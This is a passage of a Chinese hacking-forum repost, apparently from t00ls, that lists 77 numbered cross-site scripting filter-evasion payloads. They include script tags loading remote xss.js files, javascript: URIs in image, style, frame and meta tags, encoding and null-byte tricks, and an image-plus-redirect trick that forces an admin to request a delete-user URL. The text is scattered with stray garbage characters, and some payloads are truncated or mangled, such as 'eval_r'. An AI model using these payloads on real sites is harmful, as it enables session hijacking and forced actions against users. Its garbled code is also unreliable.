貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
! `* L; j- l3 U: D(1)普通的XSS JavaScript注入$ M R% a& i9 a+ }
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 _# O Z$ ~$ j( p1 _* B3 Q) I(2)IMG标签XSS使用JavaScript命令3 e" A; F! U4 i; i( |
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- U- M [! a! ?9 C" M(3)IMG标签无分号无引号' D. t' Q5 G- S) S8 I2 `7 C x
<IMG SRC=javascript:alert(‘XSS’)>
: V+ a( e7 j. ?1 z; P(4)IMG标签大小写不敏感
8 w5 I2 X( R6 C5 ^* L<IMG SRC=JaVaScRiPt:alert(‘XSS’)>8 B& u3 c- N8 \
(5)HTML编码(必须有分号)0 w. Z) C7 E- ~! ]% }$ G. f
<IMG SRC=javascript:alert(“XSS”)>
8 Y1 w& M7 K0 ~0 t$ L(6)修正缺陷IMG标签2 v7 P- @* A% f; T& t7 v
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>9 ]% t7 @2 Y5 B" d4 w
! o! M7 c! E& q9 l1 \+ g$ E+ V ^/ T
; w6 z4 I# E6 I7 b% r% r l8 W(7)formCharCode标签(计算器)
8 X3 W9 i, ? U. z<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>2 x6 ^ s8 S$ `7 x0 }! u
(8)UTF-8的Unicode编码(计算器)2 o6 Q4 Q4 m; _, V9 k( Y
<IMG SRC=jav..省略..S')>3 B* a. t/ S; m( ^# Y( J* u3 A
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 l' `% |- N' l( j9 C
<IMG SRC=jav..省略..S')>! m! f0 C6 q( E, D, P+ t0 m
(10)十六进制编码也是没有分号(计算器)
! K# y3 q* p5 i) c<IMG SRC=java..省略..XSS')>/ P8 b1 _; o6 S3 V1 u! T
(11)嵌入式标签,将Javascript分开
5 o0 n0 q( z7 h5 j<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 E. Q2 j9 z/ A" v/ w; s/ C(12)嵌入式编码标签,将Javascript分开/ A& R! l" a8 _: Q0 x! B
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 C) o7 Z: n5 Z- _$ m
(13)嵌入式换行符/ `3 ?6 |2 Z0 F7 k+ C- F& u
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 g! U- Y4 J3 y, l% f' y! Q; A(14)嵌入式回车 d4 u o4 f* q- j% D8 i: @
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& g6 v; L6 o+ E$ y(15)嵌入式多行注入JavaScript,这是XSS极端的例子) a; U$ Q: V, R a6 v: h
<IMG SRC=”javascript:alert(‘XSS‘)”>
h' G x# R7 d" G$ S7 @(16)解决限制字符(要求同页面), s* {# K6 Z5 d5 V% A0 z
<script>z=’document.’</script>
; l/ \6 [8 ]0 ?( D7 ~0 l0 M7 F<script>z=z+’write(“‘</script>2 J# z( q! B0 m0 H# ~1 {
<script>z=z+’<script’</script>
1 I/ L$ B5 K4 F<script>z=z+’ src=ht’</script>/ q$ Q% Q/ \% z% ~# U7 c) E. Y
<script>z=z+’tp://ww’</script>
) i, b! I1 p. w+ U<script>z=z+’w.shell’</script>$ E; j) U2 x Y
<script>z=z+’.net/1.’</script>5 c; e! q) L" B
<script>z=z+’js></sc’</script>$ L/ O2 I# }- k. f
<script>z=z+’ript>”)’</script>
: P' p' @& d% ~# x0 I; k* B<script>eval_r(z)</script>
1 a# g' ]" e' b! i2 T7 b6 R(17)空字符12-7-1 T00LS - Powered by Discuz! Board
! T) P( ?! u+ m% n, `https://www.t00ls.net/viewthread ... table&tid=15267 2/6% G' b& j5 |! Z: F1 l+ t7 L
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ Z- {) z0 l% r8 |2 I, ?(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
' S3 O& d9 Q0 V# W9 @- L- S1 F3 wperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 `! |" e% z }: \) N' o( h7 [2 w(19)Spaces和meta前的IMG标签+ b3 \0 Y( [* d5 s$ l1 p* t m1 ^
<IMG SRC=” javascript:alert(‘XSS’);”>7 o: ?7 H+ \# J; v5 \; Q* C; H
(20)Non-alpha-non-digit XSS, ?4 D- ?- N2 |- j: g
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 I& w C* ?9 g$ a8 v
(21)Non-alpha-non-digit XSS to 2
9 V( B& `- L2 E7 j: I<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
0 Z i. B9 s; P2 i/ ^(22)Non-alpha-non-digit XSS to 3
/ L; i9 C' T' w+ q* z+ J0 n<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, ~! }" `9 ^+ Z# r4 H(23)双开括号
: c8 |1 f* N5 D<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! k* }1 B! {. i, ~(24)无结束脚本标记(仅火狐等浏览器) t0 z$ B' H$ N: m
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! G" ~7 a/ a1 w$ P7 P
(25)无结束脚本标记2: j' Z+ ~' Y$ L i( u: ~
<SCRIPT SRC=//3w.org/XSS/xss.js>& Y4 ~2 y1 W% O6 W/ Q* h0 _) b
(26)半开的HTML/JavaScript XSS0 L$ Z: j; b* o1 [& o
<IMG SRC=”javascript:alert(‘XSS’)”3 u+ E' c7 e$ \* M7 a9 s; d
(27)双开角括号
5 a* J0 W7 M& s* N" l5 a<iframe src=http://3w.org/XSS.html <9 A/ H) S1 L2 t& {6 I9 ]$ e
(28)无单引号 双引号 分号, j" `$ [. r8 H$ H
<SCRIPT>a=/XSS/
( X m: j9 M |0 zalert(a.source)</SCRIPT>
! S: K( x" m1 c% ~( K5 P, r(29)换码过滤的JavaScript' y* g3 ]8 _- u& \+ D
\”;alert(‘XSS’);//9 `1 V! ]7 L! g8 l4 U
(30)结束Title标签# c$ l+ k! H) p! P
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* v3 b9 U5 N+ H! `& J9 q1 R8 W
(31)Input Image3 ?& Y. A! l2 \5 C2 A
<INPUT SRC=”javascript:alert(‘XSS’);”>
4 R* u& Z* D/ W(32)BODY Image
" g, A1 O: s! m/ B" \+ S- e<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
! g1 Q+ l7 e; n! |8 a; {(33)BODY标签
) y4 G, D) G* R$ U<BODY(‘XSS’)>
! n9 W% g3 i8 _, }(34)IMG Dynsrc
) g2 a0 F+ Z! ]& p' C9 s<IMG DYNSRC=”javascript:alert(‘XSS’)”>4 W; I9 v$ f; _) P
(35)IMG Lowsrc9 w6 D! x' r# K- q/ E. o; k
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
/ _: w# S7 m( A% x6 m2 F c(36)BGSOUND
}# Q- Z, e i5 S/ ` A<BGSOUND SRC=”javascript:alert(‘XSS’);”>+ @9 p, \# r- Z& s9 ~! P
(37)STYLE sheet
) ~% |; R% @% ?: F2 Y<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 y! X. y- A& K3 m( a& [$ K/ Q
(38)远程样式表
* A) R- e- |( H7 q* ]$ A# E/ f4 ?<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>1 ]) ^( X" u& a) z- S( ^1 P
(39)List-style-image(列表式)
3 M! l) X; l* k z, G) _5 j* D# f3 S1 v<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 x; D: u9 s; e" P+ P6 V(40)IMG VBscript6 I, x7 v0 V s- E$ a& S
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
% h% E! ^3 Y, s1 N1 r- @(41)META链接url
6 g" P/ z# y6 i& \( x/ p, \0 T R
( ^5 C" ?9 }1 G% ]
<META HTTP-EQUIV=”refresh” CONTENT=”0;5 N. V& i5 d6 D: _. ]
URL=http://;URL=javascript:alert(‘XSS’);”>; L7 l% Z- w9 q, V$ q. G
(42)Iframe* G! u! U/ ^) z1 y9 C5 l/ n$ }. t' ?" `* d
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>9 I( g" S: [0 f% F7 I! G" _
(43)Frame
( I5 i I: O0 b, ~<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board' k( b! s. O$ ?
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
! K# C* f- |% s( i3 s(44)Table% @( h/ ^6 J" z1 Q8 T" t S8 ^
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) q, r' c+ `: ]# j3 ^4 s
(45)TD; B. N; ^/ r3 Z* d7 z; o! K
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>& ?# M7 e4 M" j+ @; C' B
(46)DIV background-image2 b& H) S0 s) L
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ n; y4 x8 e* H(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-2 L, f+ m3 L/ b0 ^
8&13&12288&65279)
" j( n1 o; `0 s% f<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- Y+ G$ F6 f S& t& r8 T; J(48)DIV expression
- A$ ]3 I7 A1 C) j<DIV STYLE=”width: expression_r(alert(‘XSS’));”>" t5 `8 d+ G" M8 @
(49)STYLE属性分拆表达8 [( l; G% V6 g0 k/ W
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># n j' P- \9 l$ s8 n, |
(50)匿名STYLE(组成:开角号和一个字母开头)
( i( Z- |9 S+ Z0 [9 i: p4 M. H<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; b7 u7 w+ |/ j) ~3 w) C(51)STYLE background-image
- v7 Z V4 h$ W' U* N$ ^<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A6 n! E5 c" P, k/ R
CLASS=XSS></A>
) f4 k9 b) V3 q/ p) ?(52)IMG STYLE方式 _; q$ Y+ E% J i' J
exppression(alert(“XSS”))’>
1 M: }( o7 N, j! F(53)STYLE background
: J! E i b3 \5 S<STYLE><STYLE/ N* x6 x3 H) j
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* j% v% k8 k* ^5 S8 b(54)BASE
9 X' l( O) M" Q+ h, l' Y<BASE HREF=”javascript:alert(‘XSS’);//”>
" |. n$ n, _, G+ g6 {0 O- N(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS* a- A. [5 h: ^6 ^
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>9 l- a6 @% P6 u6 ~" V& M
(56)在flash中使用ActionScrpt可以混进你XSS的代码
3 u& \$ y* e- _. f( r* | Na=”get”;
4 _% G- s: w- g$ Lb=”URL(\”";
" y' U4 E+ _4 s7 yc=”javascript:”;. r% M6 b0 {" W3 B& X9 _
d=”alert(‘XSS’);\”)”;
# X1 ?* h K! x, k0 Ueval_r(a+b+c+d);
; L: P, Z* v6 U, P' z(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
* C& X b# b* K* C<HTML xmlns:xss>
* F" q* B" Y7 n<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
* S% W; R8 j: @<xss:xss>XSS</xss:xss>
; j) r5 \6 i) J</HTML>, ]4 [ I' [; _% v. l$ a2 h
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用" u$ s% ]' u1 E5 \
<SCRIPT SRC=””></SCRIPT>
9 I1 y1 @ [' a9 m. }(59)IMG嵌入式命令,可执行任意命令6 o% c+ f2 b7 u9 c! u- J
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
( m# A4 h Q" e1 }+ m" U3 ]1 W3 o(60)IMG嵌入式命令(a.jpg在同服务器)
; D7 J8 \" G( Z+ yRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
4 }( r" ?/ U& M0 I4 N(61)绕符号过滤1 H; j; l+ h4 z' T
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, p2 Q/ F a2 w3 \$ d(62)" @) F" c5 }0 _% n0 X, j
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 F4 t/ S$ M. _1 {: I) H(63)+ }( W3 U% H1 X6 ~2 e$ X
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>) z/ p$ U& R# ^# T0 }7 s1 q- s1 o$ w
(64)0 i- R. I4 k' b4 b
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>$ }! Z5 h# N8 ]8 d9 m
(65)# @6 b R2 D. o. d
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>/ i' G# _6 X% d/ _) b" C
(66)12-7-1 T00LS - Powered by Discuz! Board
% ~8 ?9 ?, q6 t; Jhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
5 {" m9 O6 p# V9 M) r$ V! l<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>, n' i6 K; J3 S% H ?, l$ V
(67); r) w* F6 I# ?2 T6 N) }
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
' Y9 ~" A7 U; Y) ~. x</SCRIPT>
$ W+ C5 ]$ k. J' Z' p(68)URL绕行
5 C- ~4 i+ d2 L0 l" i# W<A HREF=”http://127.0.0.1/”>XSS</A>
1 e, A' u+ E" |! r3 E' ]- `1 x" m/ `(69)URL编码) `# ~. [# E- w1 M5 \# J+ g
<A HREF=”http://3w.org”>XSS</A>" C* ~3 |/ ~" H2 o
(70)IP十进制
& a# |6 M8 r. q<A HREF=”http://3232235521″>XSS</A>$ V# v7 x. D, c
(71)IP十六进制
) e' I: a9 r6 f, V" M2 k<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
# L* O% x; B. ?% J" |" V6 R, B(72)IP八进制
. E( l% M ]* E8 T<A HREF=”http://0300.0250.0000.0001″>XSS</A>! C6 N2 Z$ K& D3 s( S0 V1 _: X: ?
(73)混合编码
. g) j: |# m1 }$ M% h, {/ v<A HREF=”h) v$ Q9 _- r9 O) H7 ]
tt p://6 6.000146.0×7.147/”">XSS</A>
8 N7 v0 z( _/ x8 d1 t/ V(74)节省[http:]' N6 ~9 I5 u' E; p
<A HREF=”//www.google.com/”>XSS</A># [8 ~' V# m1 D
(75)节省[www]
( _' |+ V6 T: T5 Y- q8 G<A HREF=”http://google.com/”>XSS</A> D' U" E- H: f
(76)绝对点绝对DNS) ~% b4 O, r( F
<A HREF=”http://www.google.com./”>XSS</A>& v H6 E8 h4 O% v
(77)javascript链接
) [* B" P, x5 {8 E" g: Y/ M5 |<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
. l9 R8 c; H4 F; c. X$ }) n! y, S9 x' L" g, G4 Y
原文地址:http://fuzzexp.org/u/0day/?p=14
$ z4 d; V/ w7 a# s
4 r" V/ E/ z# u" {- X* R |
发表于 2013-4-19 19:22:37
收藏
支持
反对